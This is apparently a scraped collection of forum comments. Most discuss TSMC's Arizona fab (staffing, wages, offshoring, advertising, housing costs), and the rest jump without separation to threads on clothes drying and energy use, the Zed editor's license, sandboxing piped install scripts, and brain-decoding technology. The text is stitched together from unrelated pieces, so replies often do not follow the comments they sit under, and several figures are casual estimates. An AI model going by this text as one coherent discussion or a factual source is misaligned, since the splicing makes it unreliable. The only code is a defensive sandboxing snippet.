I'm unconvinced the only way to make these chips is for highly-trained engineers to caramelise onions on the stove. (At the very least, they could be allowed time to conduct experiments into new production methods, et cetera. Similar to how universities let professors do research in exchange for putting in teaching hours.)
> The way it was described to me is that every major piece of equipment has a PhD assigned to it...
Did they mean that literally, or just that an expert was assigned to it? What kind of PhD would even be relevant to maintaining machinery on an assembly line? Perhaps a PhD on the operations of that specific machine, but even then, the person's knowledge would be so focused on whatever physics/chemistry/science is being used that I find it hard to believe a PhD would know what to do when something broke without tons of specific training on the hardware.
A PhD is really just a project in an academic setting.
There's likely little real-world difference in capability between someone with first-class honours plus a year in industry and someone with first-class honours plus a PhD.
I mean, it's a long, specialized project. It really depends on the specialization. A new grad with a PhD in some LLM tech would be grabbed up much faster than a hobbyist with 5+ years in general SWE and maybe some pet projects made with AI tech.
> The way it was described to me is that every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong.
Yes.
"It’s the Most Indispensable Machine in the World—and It Depends on This Woman"
Not just long hours right? Speaking to Taiwanese friends involved in semiconductor work (not TSMC employees though) it's the shift work that's really hard to manage in the US.
50k was until recently a decent salary (outside SF). In the last 5 years, not so much anywhere outside the absolute lowest-CoL areas.
But yes, most Americans do not want to work a death march, and employers don't want to pay for it. I doubt they can argue 50k as exempt, so that's a lot of overtime. They may as well be salaried at six figures at that point.
Why would they require these hours? In the U.S., I think they would need to pay time and a half for anything north of 40 hours. It seems like it would be cheaper to hire more workers and not force the overtime. Then they might be able to increase the salary some. Everyone wins except the people who are willing to sacrifice the time for time-and-a-half pay.
This is only accurate inasmuch as most salaried employees are overtime exempt for other reasons (e.g. because they are executive or administrative professionals). Paying employees a salary, on its own, does not make them overtime exempt.
One that comes to mind is an on-site caretaker position (e.g. on a remote property), where the employee is effectively being paid to be available, not to do a certain number of hours of work.
50k is just a step above McDonald's these days in a lot of areas. Sure, minimum wage might be $15k, but realistically nobody pays that little except in very rural areas. (If you need a small number of low-skilled employees, a small rural town is a perfect spot to build; but if you need more than a small number, they can't provide more at any price. You will pay more in the city, but there are a lot more people around if you need more.)
AZ minimum wage is $14.70. If it were 996 and you somehow only got straight time for working 72 hours a week, it would pay $55,000. Assuming there's no overtime exemption, it would be $67,000. I'm pretty sure it's not 996 in AZ.
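Checking that arithmetic (a quick sketch; assumes 52 paid weeks and the standard 1.5x multiplier past 40 hours/week):

    AZ_MIN_WAGE = 14.70   # $/hour
    HOURS_996 = 6 * 12    # 9am-9pm, six days a week = 72 h

    straight = AZ_MIN_WAGE * HOURS_996 * 52
    with_ot = AZ_MIN_WAGE * (40 + (HOURS_996 - 40) * 1.5) * 52

    print(round(straight))  # ~55037
    print(round(with_ot))   # ~67267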
By how much? Where I live in IA, McDonald's is starting at $17/hour, which is not that far behind California. (And both states are large enough to expect some variation depending on where you live.)
That's why manufacturing offshored in the first place: companies feel they're receiving better value for money on wages elsewhere for this kind of work (and these days, not to mention more and larger facilities, proximity to component sources, and a strong ecosystem of supporting and complementary facilities).
I think that's obviously a major part of it but it ignores other stuff like lax environmental and safety standards.
It would be interesting to see how much of the economic advantage of offshoring is due to lower wages intrinsic to a lower cost of living vs. stuff like ignoring/bribing foreign officials or non-existent environmental/safety standards that objectively should exist.
Personally, I won't mind paying more to buy manufactured goods. My mom told me that a pair of sneakers before the offshoring back in the late 80s usually cost more than $300 in today's dollars. Yes, it was expensive, but I would just buy fewer and use each one for a longer time. The reason is that in the long run the manufacturing cost would get lower due to increased efficiency, while the loss of the supply chain is detrimental to the entire country, and our living expenses will increase overall. Case in point: how much tax do we have to pay, and how much inflation do we have to suffer, in order to build those super expensive weapons? Part of the reason we had $20K toilets and $100 screws is that we simply don't have a large enough supply chain to offset the cost of customized manufacturing.
Besides, the US loses know-how on manufacturing, eliminating potentially hundreds of thousands of high-paying engineering jobs. It is also a pipe dream that we can keep the so-called high-end jobs by sitting in an office drawing boxes all day. Sooner or later, those who work with the actual manufacturing processes on the factory floor will out-compete us and grab the cushy "design" jobs.
You can feel free to buy American; I don't care. I would prefer it were not mandated, so you get your individual choice to pay more for your goods if you want.
It's easy to get better value on wages when you get to pay under the minimum wage of your home country. And/or aren't required to offer benefits or vacation. And are able to work them twice as long without overtime pay. And don't need to care about child labor laws.
More so in the Chinese-speaking world and South Korea because the industrialization/urbanization is more recent, so there's rising demand in the urban areas with high population growth, resulting in high prices.
Japan's urbanization stopped long ago, and it's not taking in immigrants fast enough, so the urban areas have stopped growing.
The mentality refers to East Asia's deep agrarian root that places high value on owning land that can be passed down the generations (the alternative was often quasi-servile farm labour that locks families in poverty). Property purchases are usually multi-generational efforts, so families can generally take the brunt of overinflated prices.
2 is pretty infamous, unless something big happened recently (a lot of big things in JP happened recently, so I could have legitimately missed something).
1 is 50/50. Urbanization is growing because small-town life is shrinking. So it's wrong at face value, but there is a cost to this in the overall economy, since the country overall isn't growing.
It's just obvious nonsense. Housing cost is a dependent variable of local economic activity. People gather, and property prices soar. Taiwan is jam-packed, so land prices would be higher relative to GDP per capita.
I think GP is finding the concept of land scarcity non-intuitive for some reason.
> Real estate is always the monkey wrench in the gears of capitalism because of high necessity yet limited supply.
This only happens when the government becomes captured by land owners to constrain the supply, since otherwise you can build up. But governments getting captured by land owners happens a lot.
The chips still need to fly back to Taiwan to be packaged, as packaging partner Amkor's facility in Arizona won't be ready until 2027*. I'm not sure of the cause of the delta, but it could be in part because Fab 21 got back on schedule rather impressively following earlier delays.
* updated to reflect newer article that Amkor's facility is delayed beyond late-2025
I was about to say, surely at some point in the near future the USA will introduce this capability. A shame they did not match each other in completion time.
Yeah, definitely unfortunate. That said, I'm guessing the overall cost of overseas packaging is really tiny; otherwise Intel would've made a great customer, since they are already packaging TSMC N6, N5, and N3 in New Mexico for their Arrow Lake CPUs.
This is not adversarial thinking. Ukraine would be delighted to hit one container with all Russia's advanced chips going to e.g. Vietnam or China to be packaged and sent back.
This is a massive supply chain weakness and presumably will be addressed as soon as possible.
Ticks do not require the consent of the host to drink blood.
Things like Google and Facebook cannot be parasitic; every dollar gained is a voluntary exchange with no threats. People choose to use Google and gain something from doing so.
Yep, if the host agreed to die, then the market is a success. We've discovered the most efficient outcome: sucking the customer dry until they die! Thank you to the free market for delivering us this efficient result.
Remember kids – thousands dying from lack of healthcare isn't a bug of the system, it's a feature. This has been determined as necessary, nay even beneficial, by market forces that can never be wrong.
A business’s viability outside of advertising doesn’t change the morality of advertising.
Regardless of which side of the camp you fall on, you can't argue that ads are "good" just because some businesses need them to survive. In fact, I'd wager that if a business NEEDS ads to survive, it's probably a net negative on society as a whole.
That's only if you call any type of promotion advertising; in that case, sure, there is some innocent advertising. People here are (obviously) talking about 'modern' advertising, which is what Google/FB etc. are doing, and which is just plain bad for everyone except Google shareholders (I would imagine that, besides the money, it's not even good for the people working on it, as it must do your head in to be a brilliant engineer and then work on tech as miserable and foul as that).
You think all businesses should just spread awareness by word of mouth? Can you put a sign on your store, or is that an ad? What if you don't have a store? Yes, advertising can be really awful, but that doesn't mean all advertising is "cancer." If you have a good business that creates actual value for people, advertising it can actually be seen as a good thing.
It is clear we are talking about modern digital ads. Ads in magazines aren't as bad, but manipulating public opinion to sell the ads was and is. That's what Google/FB do at an absurdly large scale right now.
> If you owned a small business you'd be singing a very different tune.
The problem with advertising is that a little bit, done honestly, is actually good and fine. What we actually have is way, way too much of it, and it's often dishonest and manipulative.
It's a similar thing with finance. It's necessary, but way too many talented people are spending their energies on it.
Black and white thinking doesn't really capture the situation, and ends up creating a lot of noise (BAN IT ALL vs. IT'S ALL GOOD AND YOU LOVE IT, FIGHT!).
Honestly, I think it might be a good thing to put caps on the number of people that can work in sectors like that (and further limit the number of very smart people working in them), to direct talented people to more productive and socially beneficial parts of the economy.
Maybe 1 percent of Google's headcount is actually working on ad technology. There isn't some brain drain problem where people are doing ads instead of curing cancer.
Directly working. But then you have all the vehicles that, in the grand scheme of things, exist solely to enable ads and make data mining for them easier, such as Chrome and Android. Then there are products that exist primarily to lock you into the Google ecosystem so that you're forced to interact with the rest of it.
At the end of the day, if most of company's income is from ads, it can be safely assumed that whatever else it does is somehow about ads even if it doesn't contribute directly. Well, or else Google is incredibly inept.
Those "US STEM grads whose skills are wasted" are the ones solving those problems (optimal ad load, bad ads, etc.), but it's a very hard problem. Don't be so dismissive.
There are "very hard problems" that don't need to be solved, or are far lower priority than other problems. Hard doesn't imply being "productive, useful and beneficial to society."
Setting aside the moral aspect, which is highly subjective and seems to have a price tag (for example, tech CEOs drop any sort of morals for a good paycheck), the productivity question is a measurable one.
I.e., does advertising as a whole increase total consumption, or is it a zero-sum game (i.e., it just sends a bigger slice of the same pie to a competitor)?
From what I know, advertising does increase total demand, i.e. more things/services need to be produced and sold in aggregate.
Some of the demand induced by ads is useful; people becoming aware of stuff they didn’t know exists, and finding that it provides a useful service for them.
But most ads are trying to convince you to buy their brand’s version of a product that you already know of, or (even worse!) a new version of an old product. Any demand induced there is just wastefulness.
If Amazon can figure out that I’m interested in headphones, I already know more actual information about headphones than their ads will give me.
I can’t relate to that. When I see a banner ad I find it obtrusive whether it’s from Bank of America or my favorite HAM radio company. If I’m in the market for a product I value hearing the testimonials of people in my life rather than an advertisement.
The one case where I find ads useful, when word of mouth isn't an option, is in a static image on a site (review site, blog, whatever) where I'm researching a thing. The ad would be related to that thing, doesn't need to know a thing about me other than I'm browsing that page, and is related to the content on that page. I click on those ads sometimes.
I’m trying to think of anything I find useful that I stumbled upon thanks to ads over the past twenty years or so, and I’m pretty much drawing a blank. It certainly seems negligible.
The problem with prohibiting ads is how to prevent (or even define) paid hidden promotions. But tracking and targeted ads could be prohibited, which would already make things much more civil and make advertising less relevant as a tech profit center.
>I’m trying to think of anything I find useful that I stumbled upon thanks to ads over the past twenty years or so, and I’m pretty much drawing a blank. It certainly seems negligible.
Maybe the ad is good when you aren't even aware that you were influenced by it?
If you're "really interested" in something, you're already following new releases, doing extensive research for purchases etc, so why would you need ads?
Even worse: because advertising is a Red Queen's race where the only limit on expense is what your competitors are spending, it's not merely unproductive, it actively increases company expenses without increasing product quality, leading to higher costs on everything for everyone.
You cannot be serious. All of the ad tech companies produce a service people want; otherwise no one would use them!
There may be other services that might be better if not for network effects, but it is trivially true that a search engine is better for most people than no search engine at all. And that is what is produced.
At least a few evil people attack once in a while, thus proving some defense is needed, so they are not completely unproductive/useless. Much as I wish they were not needed.
It is, though: more value is generated by the MIC than is put in, and war has yet to ruin the productive capacity of the United States. The societal ills of this are why it's popular to call America an evil empire.
No actually, that's about the opportunity cost of war. There's a left-wing argument I frequently see that the US finds wars to increase profitability but I'm talking about the propping up of firms to keep the industrial capacity ready. It is not the most productive use of capital, but it is productive.
I don't either, and I don't want a war with either Russia or China nor do I want the slow escalation that is currently happening. But the political reality is that the US will not be decreasing defense spending any time soon. There's no voting this situation away.
I think about this quite often. What I'd really like to study at some point is: how much more does the receptionist at JP Morgan's headquarters make than the receptionist at Walmart's headquarters?
Because fundamentally I think there is an effect where the people in proximity to lots of money earn more. Obviously the Walmart receptionist and the JP Morgan receptionist are doing basically the same job. But the JP Morgan receptionist is surrounded by people who wouldn't think twice about doubling the receptionist's pay, and I would imagine that has a significant effect.
Experienced this (or actually, a similar phenomenon) myself during the brief, beautiful moment in my life when I was working in Switzerland and making as much as the locals, while hailing from a country with approximately 20% of the GDP per capita, if not less.
Crazy how the same box of pasta is suddenly three times the price once you cross the border.
It's not the proximity to money, it's the real estate tied to doing that job.
If you want to be the receptionist at Goldman Sachs at their headquarters at 200 West Street, New York, NY 10282, then you're looking at paying $616,250 for a 556 sq. ft. studio apartment. And that's just the housing. If you want to live within 30 minutes of work, you can get that number down to $400,000, but that's also a studio apartment.
Then you have to consider some place to eat - or you bring your own meals.
What about clothing? You need clothing that looks the part.
It's the proximity to real estate, which I guess you could argue is a proximity to "lots of money" as you put it, but... not reeeaaaally...
Sure, but real estate is expensive in those places for a reason - it being typically because a sufficient number of people with lots of money want to buy it.
There is only a weak correlation between local income and housing costs, and most of that is that it's hard to get extreme housing prices in areas with low income, rather than that housing in high income areas is inherently required to be expensive.
For example, Boston has a higher per-capita income than NYC but somewhat lower housing costs, and Austin has around the same per-capita income as Los Angeles but significantly lower housing costs. Because it's a lot easier to build housing in Texas than in California.
These companies hire all of these exemplary graduates and pay them so well because (1) they are flush with cash because businesses are essentially held hostage to adtech; and (2) so that they won't go out into the world and build systems that make them irrelevant, as smart people are wont to do from time to time. Someone on your payroll doesn't have the time nor the inclination to knock you from your pedestal.
Why else would Google need 182,000 employees? Or how about Facebook with 67,000? Microsoft clocks in at a whopping 228,000, and Apple at 161,000.
These are staggering numbers of employees. So many, in fact, that it would be an exercise in futility to try and manage so many for the number of products they offer, especially Google and Meta.
It's cheaper to make busywork than risk the cash cow.
Options traders are paid well. It's still unproductive.
You're just shifting around a bunch of numbers temporarily to make a bunch of money for someone and lose a bunch for someone else.
Lots of shit we do is well-paid and unproductive.
If, as a species, we eliminated all bullshit jobs, there's a good chance only 20-30% of the species would be working. Here in America, only around 50% of people are actually working. Everyone else is in school, or retired.
You are downvoted because what you say is unpopular, but nobody tried to refute what you say.
Despite what some people may think, options are not just for gambling; some people - like farmers who have to plan for uncertain weather - use them for a real purpose. And of course the use of options in the financial sector for hedging is extremely important too. But it's easier to dismissively say that trading options is a "bullshit job" and go back to one's ivory tower.
For a new factory with a new entry into the local market it makes perfect sense to bring in experienced workers for knowledge transfer. This is more an issue if a decade later this is still how things are done.
Back when American companies were offshoring, the initial start up teams were comprised of a lot of Americans who would do commissioning and initial ramp ups while training up the foreign workers. It's a lot easier to train people on a production line that is proven to work.
Problem is, those jobs in emerging markets were desirable compared to other jobs (for pay and opportunities), which helped with talent growth. These factory jobs, in comparison to other jobs, aren’t that desirable.
Fairly bad locations, average pay. It's not like the newer Japanese chip towns, where you can get on a train and be in a proper city (e.g. a 40 min ride from Chitose to Sapporo), with okay pay as well. If the pay were really good, it wouldn't matter, but selling this dream to a university grad is a bit hard in the US. I still hope it pans out, though, because a NA manufacturing revival would be great. It's just that the odds are against it so far.
Edit: This is not news. This (combined with their higher EE education) is why Taiwan won IBM PC-clone-related manufacturing in the 80s. And why they now have TSMC.
Such a great victory for American industry... the future is to bring in workers from Taiwan with the skills and the willingness to accept a fraction of US salaries.
Say TSMC pays super competitive US salaries to attract US-only labor. That higher labor cost makes the end product more expensive, which makes the fab uncompetitive globally, which sends Apple off to buy from someone else, and TSMC either leaves the US or goes bust eating the losses.
You can't compete with lower-wage countries in a globalized world with no trade barriers and no tariffs, when Apple wants higher profits and consumers want lower prices. Something has to give.
You can put tariffs on imported chips to equalize the field, but then iPhones would be more expensive for the average American and Apple's stock would tank.
More automation. Given the chemicals involved in fab work in general I expect this fab is very automated just for safety reasons and so very few employees are needed. Thus the cost of labor isn't a significant factor.
>Thus the cost of labor isn't a significant factor.
It is. Semi fabs aren't fire-and-forget. You need highly skilled people to constantly check and tweak all the operations in a feedback loop 24/7 and every hour of downtime due to any issue means millions lost. You hire the right people to minimize that downtime while also keeping the costs in check. It's a delicate balance.
The problem was never the cost of labor. US tech is already highly profitable and could pay the full salary if it wished to. But their desire is basically to get a free pass to pay lower salaries by any means, so they can send more of those profits to shareholders. The US is essentially a fighting arena between shareholders and workers. The profit is there; it is just a matter of how businesses want to keep ever more of the spoils to themselves.
Why would well-educated US grads go work in a semi fab for 50k when they can make 5-10x that in an office or at home, getting people to click on ads in the Bay Area, or moving money around between tax havens in New York?
Your answer explains why the US is creating a failed society. It either implodes or needs to control other countries to maintain its profit and consumption levels.
This solves the US national security issue; in the event of a war between China and Taiwan (and a possible proxy war with the US), Taiwanese immigrants would qualify for asylum.
This is not arrogance. This is not even about China and Taiwan fighting a war. (Heck, that's probably never gonna happen anyway.)
This is about the US manufacturing important things on our own. And it's not just the US either by the way. The Europeans want to be able to manufacture their own chips. The Russians. The Chinese. The Japanese. The Koreans. And on and on and on.
Why? Because the current system is dumb for everyone who is not Taiwan. For a whole lot of reasons. (Most of them economic.) No one wants to say that out loud, but it's the truth. We can't have everyone dependent on chips but only one nation capable of making them. Again, we're not the only ones who have come to this conclusion. Are the Chinese also "arrogant"? Are the Japanese "arrogant"? The Europeans? The Russians? Are the Koreans "arrogant"?
So everyone else can make common sense moves, but it's "arrogant" if the US does the same common sense thing? So we should just keep paying out an increasing share of our GDP as chips become more and more important and expensive while everyone else makes moves to cut their costs right? Is that what we have to do to be considered not "arrogant"?
You can't really be this obtuse. Asylum of high-skilled silicon workers from an ally under invasion isn't nearly the same thing as the asylum being granted over the last 4 years to anyone who could download the CBP One app.
> the asylum being granted over the last 4 years to anyone who could download the CBP One app
This is entirely unmoored from reality. CBP One only allows people from Cuba, Haiti, Nicaragua, and Venezuela to make appointments, and once they have one, they have to actually show up and argue their case (why they need to come to the US for their own safety). You can’t just show a border patrol officer that you have CBP One and walk on through.
How much does salary contribute to the overall cost of operating TSMC? Perplexity said that the average salary of a TSMC employee is $76K a year, and TSMC has about 80K people. So it costs them around $6B a year in salaries. Meanwhile, their operational cost was about $46B a year, so that's about 13%. TSMC shipped about 16 million 12-inch wafers. Each 12-inch wafer can make about 300 to 400 chips; let's say 200 to stay on the conservative side. That will be 3.2B chips a year, which means the salary cost per chip is less than $2. It looks like headcount cost is not that dominant?
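A quick sanity check of that arithmetic in Python (all the inputs are the rough estimates above, not official TSMC figures):

    # Back-of-the-envelope; every input is a rough estimate.
    avg_salary = 76_000        # USD per employee per year
    headcount = 80_000         # employees
    opex = 46e9                # USD per year, total operating cost
    wafers_per_year = 16e6     # 12-inch wafers shipped
    chips_per_wafer = 200      # deliberately below the 300-400 range

    salary_cost = avg_salary * headcount                        # ~$6.1B
    print(f"salary share of opex: {salary_cost / opex:.0%}")    # ~13%
    chips = wafers_per_year * chips_per_wafer                   # ~3.2B
    print(f"salary cost per chip: ${salary_cost / chips:.2f}")  # ~$1.90

Note that picking 200 chips per wafer is conservative in the right direction: fewer chips per wafer means a higher per-chip salary cost, and it still comes out under $2.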
Making chips isn't something you learn the details of at University. You can take all the classes you want in advanced semiconductor techniques but the simple fact is University level manufacturing is nowhere close to SOTA.
Basically, you need fab workers to spend time in Taiwan/China and then return to the USA. It's the same model most foreign students use at schools in the USA/Canada: get a US/Canadian name-brand school on the resume, learn English, and go back to the home country = profit.
Re the first point: Why do you think it is so difficult to transfer chip production off Taiwan?
I don’t think this is about salaries. Nor is this about facilities.
This is about process know-how. And it’s currently not available outside of Taiwan. I’m glad we’re finally starting to transfer knowledge. It will take a couple more years.
Does anyone know the general path to get involved in this? Perhaps it's romantic, but this seems important, it seems hard, and it seems like something I could be proud of working on (as opposed to maximizing ad clicks). I'm just a SWE with a comp sci degree, so what's the entry point here?
Your entry point is a master's and probably a PhD in Electrical Engineering, specializing in some aspect of semiconductor manufacturing. It's definitely not CS.
Surely there is a lot of software involved in the design/operation of these fabs; it's not just designing the chip directly. Another commenter mentioned EDA, so maybe I'll look into that.
There is a huge amount of software in every single step of making an ASIC, digital or analog. Or even a PCB for that matter. Long gone are the days of cutting tape and etching anything yourself. Apple's M3 has 25 billion transistors. No human drew those.
I'm not too sure, but I would assume there are going to be faster-turnaround prototype chips in the USA now? Is packaging needed to prove out a prototype? Can we start buying IP blocks and making our own ICs? I'd love an MCU with a built-in IMU and a wide-range LDO; not sure if that's possible all on the same node.
There's going to be some niches opening as a result of this IMO.
It might be possible, but domain knowledge might give some candidates a leg up on the competition; going in blind just seems suboptimal. Though most of the relevant EE undergraduate classes were at the sophomore and junior level for me in the late 1980s, and I only got to use EDA software when working a couple of semesters for AMD as a junior.
It's a first step. You've got to do something to bootstrap and solve the chicken-and-egg problem. From what I can see around me, "made in America" is no-joke branding; a lot of people are going to buy just because of that, and may even consider it a matter of social status and political support.
Another $100. That's a little over six years old now though, so bump it up to $200.
Would I pay $1399 for an American made iPhone with American made internals, as the article suggests it would cost ($100, but I doubled it for inflation, because, why not?)? You bet your sweet ass I would.
I have two kids, in grade school and middle school, and I see why we have a STEM gap. I have to constantly correct the learning at home in math. Also, I think it's fair to assume that in Korea, Japan, Taiwan, and China the school kids are actually put on an academic grindset, unlike here, where there is so little academic rigor or discipline enforced by the schools that it makes sense why the K-12 education numbers are as bad as they are in the USA.
It might be worth getting up in front of the kids in middle school and up and saying, "Hey, you're in competition at a global scale here. You're going to have to work your butts off to stay relevant."
Sure, but this is how a supply chain gets bootstrapped. All those factories in China didn't magically appear one day. Just like they didn't appear when Apple started moving operations to Vietnam. You start piecemeal and build out.
Maybe that's how the US is going to get enough STEM talent -- just like in WWI and WWII, take as much talent as possible while the other parts of the world are in the shit.
The scenario that we’re going to be able to fight a war with another first world power, where we will attack their infrastructure but ours will be left untouched, seems unlikely.
We just need to make sure that we never fight directly with another regional power, e.g. China or Russia. IMO, neither of them wants a fight with the US too, because you don't want to push a super power to the corner, EVEN if you think you are good enough to win.
In the meantime, the situation in the EU and Asia is going to deteriorate, and North America can absorb more talent as it sees fit. The last two times it was mostly the EU, but this time Asia might be the new talent pool we can draw from.
It seems likely enough if the situation escalates. The conflict could be anything from a naval skirmish where neither side attacks the other's mainland to a total war scenario. It will likely start as naval-only and become gradually more involved if no side backs down.
However, it's safe to assume cyber attacks will hit Arizona. It's not unreasonable to assume crazy people will attack critical infrastructure, and we'll have to deal with the social fallout from that.
I have no specific info regarding this plant, but for anyone who has never experienced this: flying in people from other plants at the start (plus all the 3rd-party vendors for a hypercare phase at launch) seems pretty normal.
If they have to keep staffing it that way, that's different.
You can fly a few hundred million dollars' worth of chips in a single flight. You need not be concerned. The impact from Temu shipments is several orders of magnitude higher.
"Made in America" is also a federally defined standard that these chips categorically fail to meet. "Assembled in the United States" is more appropriate, and even then, if you didn't hire Americans to do it, what was the point?
This is starting to feel like the best of intentions spiraling into political theatricality, where close-enough will be good-enough.
Given the current state of declining US college enrollment, the affordability crisis of college, the growing wage gap, the failure of the minimum wage to keep up with the cost of living, and the failure to reform predatory US student lending practices, I do not see how the US will, in the next 25 years, manage to curate the kind of braintrust for which it was once renowned across the globe.
This is so disconnected from reality. They've gone from breaking ground to replicating one of the most advanced fabrication processes in the history of the world _at scale_ in about 4 years, but because they'll be sending the dies off for packaging while their packaging partner comes online, it's just political theatre?
Also, over half of the employees are local hires, and the ratio will increase as more of the fab spins up. IMO it would be much worse political theatre to delay and balloon the cost of the project by forcing TSMC to exclusively use a workforce that has no experience with the company's tools and processes.
How about we continue using something more convenient, like a standalone dryer, and focus our energy-reduction efforts on the largest target, which is manufacturing, at a whopping 76% of the total electricity consumption in the United States (https://www.eia.gov/energyexplained/use-of-energy/industry.p...), as well as transportation. Nothing else comes close.
Residential energy use (excluding transportation) is a bit over 20% of total US energy use [1]. Industrial use is about 32%.
Of the transportation sector, about 25% is "cars and motorcycles" and 32% is light trucks; however, a lot of that light truck usage includes pickup trucks for private use. [2]
I can't prove it without more Googling, but when you put the two of those together, the energy use under the direct control of consumers likely exceeds that of the industrial sector (rough numbers sketched below).
So while this is small beer, switching out your gas heating and hot water for electric heat pumps, insulating your house better, and switching to EVs are a big deal in terms of reducing greenhouse gas emissions, not to mention the almost forgotten but huge benefits of reducing local and especially indoor air pollution.
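For what it's worth, here's that back-of-the-envelope in Python. The residential/industrial shares and the transportation breakdown are the figures quoted above; transportation's share of total US energy use (~28%) is an extra assumption I'm adding, so treat the result as a rough sanity check rather than proof:

    # Shares of total US energy use; residential and industrial are
    # the figures quoted above, transportation (~28%) is assumed.
    residential = 0.21
    industrial = 0.32
    transportation = 0.28   # assumption, roughly the EIA figure

    # Within transportation: cars/motorcycles 25%, light trucks 32%,
    # per the breakdown quoted above.
    personal_transport = transportation * (0.25 + 0.32)   # ~16% of total

    consumer_controlled = residential + personal_transport
    print(f"consumer-controlled: {consumer_controlled:.0%}")  # ~37%, vs ~32% industrial

Even if you discount part of the light-truck share as commercial pickups, consumer-controlled use still lands at or above the industrial sector's share.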
Why fight an uphill battle for reduction in manufacturing when you can get rich by being the first to offer cost competitive on-site carbon free power production? Forget marketing rooftop solar to households, you should be selling micro-nuclear to steel and cement plants.
A lot of American steel mills have houses literally right next door to them, in part because many of them were built before the widespread availability of cars.
There's no way in the world you're putting a nuclear plant on site.
Why not? Nuclear is far safer than a coal or gas plant and that's using the older model reactors as a stats source. Newer small reactor designs are even safer. Anxiety and fear of nuclear power is a purely media and activist driven phenomenon not supported by any evidence. The chances of you dying as a result of radiation released from a nuclear power plant are incredibly small even if you were to live right next door to one your entire life. You're much more likely to die in a car accident and yet you'll use those every day without a second thought.
As a society, it makes more sense to figure out how to generate more clean energy (rather than to try to reduce our energy usage).
But as an individual who wants to do something, and in principle has an incentive to reduce their energy bill, reducing consumption is the main thing under their control.
Perhaps it feels like turning down the thermostat or skipping the dryer helps, but the vast majority of your energy use is baked in by the manufacturing and transport of everything you use and eat.
If you live far from the temperate zones, just keeping yourself alive costs a ton of energy.
The best thing you can do is making nuclear and solar an issue with your local politics and then voting for it.
I would say the best thing you can do is "making nuclear and solar an issue with your local politics and then voting for it" and then also trying to reduce your energy consumption
"Quirky" Japanese technology? Buddy, it's a dehumidifier. That thing you can buy at any big-box store in the US? Except they put it out of the way in the ceiling of the room that is the most humid. In Europe there are "drying cabinets" that are the same idea. Some only have fans/heaters, others have dehumidifiers.
I exclusively dry my clothes on a ~$30 folding clothes frame that will take a full washer load. If I'm in a rush, I point a fan at it.
In the winter, the humidity is welcome and the fan alone dries the clothing really quick. In the summer, I set it up outside. If there's a good breeze, my laundry is dry in no time. If I set it up indoors, the central AC takes care of the humidity.
My electric bill is tiny and my clothes last forever because they're not getting beat to shit for half an hour every week...
They are almost exclusively metal, with some plastics in the more expensive models (e.g. https://www.lidl.de/p/leifheit-standtrockner-pegasus-180-sol...). They are 3-4 cm thick when folded and big enough to hang an entire load from a regular-sized washing machine.
Are dryers really more convenient? Maybe I'm just lucky to live someplace dry, but I find skipping the dryer is the less-work route. It's a whole separate phase to deal with. I only use mine now if I'm in a hurry for something to be dry, which is pretty much never.
Eh, it's still a second phase. If you have enough empty space in your closet for air to circulate around each item, you can just hang things straight from the washer into your closet. They're dry by the next morning.
Before anyone jumps on a new text editor bandwagon, just a note on the license they have you agree to in using it:
"Customer Data consisting of User content created while using the Solution is classified as "User Content". User Content is transmitted from Your environment only if You collaborate with other Zed users by electing to share a project in the Editor.
[...]Zed's access to such User Content is limited to debugging and making improvements to the Solution."
No commentary from me. Come to your own conclusions.
I would like some commentary from you, sounds very reasonable to me, I don't understand what the problem is.
Of course if you choose to share your project with others for collaboration, the content of that project is transmitted from your machine, what else would you expect? How would it work otherwise?
I misread the above comment, it seems. However, my point was that for many it is not an instant "no", since so many buy space from GitHub et al. Probably most of the small companies.
They already have trust in place. Do they trust Zed too?
The thing is, every time you load company proprietary code and/or sensitive data, you'd better make sure you don't hit the share button as well.
Not the end of the world, but also something we didn't have to think about until recently: that pushing a button (other than delete) could potentially get you fired.
This question of who gets to see your company data is, I think, a lot thornier these days than ever before.
You're joking about email, but that's of course the reason why companies will pay a lot to host email on premises instead of relying on cheaper offsite solutions. I think Exchange Server is Microsoft's biggest foot in the door to companies that otherwise wouldn't care much about the other Microsoft services.
Having a third party look at every email you're sending around is just a non starter for many businesses.
Getting the same setup in an editor, where your code is shared with the editor company every time you want to show it to a colleague, is not trivial at all.
You can examine the contents of the shell script yourself -- but how is this any different from running the rest of the application without examining the source?
Do you just draw some arbitrary line and say, "running easily readable shell scripts is bad, but compiling and running code I have never looked at or completely understood is okay"?
Really the only logical answer here is to adopt a zero trust security model and just assume every line of code is compromised. Run it in a VM, in a container, firewall it, jail it, sandbox it, etc.
Otherwise you're whispering sweet nothings to yourself if you believe piping unknown scripts to a shell is the most vulnerable thing you can do here.
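For concreteness, a minimal sketch of that zero-trust stance in Python; Docker is assumed to be installed, and the URL is a placeholder. Instead of piping the script straight into your shell, you fetch it (so you can read it first) and then run it in a throwaway, network-less container:

    import subprocess
    import urllib.request

    SCRIPT_URL = "https://example.com/install.sh"  # placeholder

    # Fetch without executing, so the script can be inspected first.
    script = urllib.request.urlopen(SCRIPT_URL).read()

    # Run in an ephemeral container: no network, read-only root fs,
    # writable /tmp only, deleted (--rm) when the script exits.
    subprocess.run(
        ["docker", "run", "--rm", "-i",
         "--network", "none",
         "--read-only", "--tmpfs", "/tmp",
         "debian:stable-slim", "bash", "-s"],
        input=script,
        check=True,
    )

Obviously a real install script usually needs network and write access somewhere, so you'd loosen this per script; the point is just that the default is distrust rather than the pipe.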
Why not? There are perfectly legitimate uses for this kind of technology. This would be a godsend for those suffering from paralysis and nervous system disorders, allowing them to communicate with their loved ones.
Yes, the CIA, DARPA, et al. will be all over this (unsurprisingly, if they aren't already), but this is a sacrifice worth making for this kind of technology.
How many people in the whole world are paralyzed or locked in? Ten thousand? Less?
How many people in the whole world are tinpot authoritarian despots just looking for an excuse who would just love to be able to look inside your mind?
Somehow, I imagine the first number is dramatically dwarfed by the second number.
This is a technology that, once it is invented, will find more and more and more and more uses.
We need to make sure you don't spill corporate secrets, so we will be mandating that all workers wear this while in the office.
Oh no, we've just had a leak, we're gonna have to ask that if you want to work here you must wear this brain buddy home! For the good of the company.
And so on.
I'm blind, but if you offered to cure my blindness with the side effect that nobody could ever hide under the cover of darkness (I dunno, electronic eyes of some kind? Go with the metaphor!), I would still not take it.
The other thing you people are missing is how technology compounds. You don't need to have people come in to the police station to have their thoughts reviewed when everyone is assigned an LLM at birth to watch over their thoughts in loving grace and maybe play a sound when they have the wrong one.
All this choice guarantees is that new technology will always be used for bad things first. It holds no sway over whether someone will do something bad with technology; after all, it's not just "good people" who are capable of advancing it. See the atomic bomb vs. the atomic power plant.
What's important is how we prepare for and handle inevitable change. Hoping no negative change comes about if we just stay the same is a far worse game.